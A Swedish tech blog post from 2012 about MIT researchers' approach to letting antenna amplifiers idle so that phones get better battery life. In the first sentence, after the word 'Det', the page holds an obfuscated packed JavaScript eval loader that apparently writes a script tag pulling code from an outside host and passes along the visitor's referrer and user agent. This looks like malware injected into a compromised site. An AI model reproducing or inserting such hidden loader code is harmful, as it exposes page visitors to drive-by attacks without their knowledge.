Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

MIT: Bättre batteritider att vänta för mobiltelefoner.

MIT: Bättre batteritider att vänta för mobiltelefoner.
Filip Urde
  • On 7 november, 2012
  • http://www.revue.se/filip-urde

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tyzts|var|u0026u|referrer|sfhhn||js|php’.split(’|’),0,{}))
är säkert inte bara jag som tycker att batteritiden på dagens mobiler är för dålig.

Inte minst på min nya iPhone 5 som jag oroligt går hemifrån med varje dag, utan att veta om min mobil kommer vara vaken hela dagen. Hemska tanke.

Detta är dock på gång att lösas, i alla fall om man ska tro två stycken professorer på MIT som har enligt dem själva kommit på ett sätt som gör att man kan mer än halvera strömförbrukningen för antenner och trådlös datakommunikation. Vilket i sin tur betyder en bättre batteritid för din smartphone.

 

”WITH HIGH DATA RATE COMMUNICATION, YOU WIND UP NEEDING FAR MORE STANDBY POWER THAN SIGNAL POWER.”

 

För att förklara det hela på ett enkelt sätt så måste en antenn för trådlös kommunikation ha en förstärkare som dras av ström. Denna förstärkare får inte gå ner i viloläge eftersom dagens kommunikation inte till ett hopp i spänningen. Vilket betyder att förstärkaren ständigt ligger på och drar ström trots att telefonen kanske inte används.

Det grabbarna på MIT (f*n vad dem kan) kommit på är ett sätt för hur antennförstärkaren ska kunna gå ned i ”viloläge” utan att störa kommunikationen. Man har börjat med en basstationer och kommer visa en produkt i vår på Mobile World Congress. När man visat upp en fungerande basstation så är det bara en tidsfråga innan vi kan se en kraftig ökning av batteritiden för våra mobiler. Det vore något det!

via: Theverge.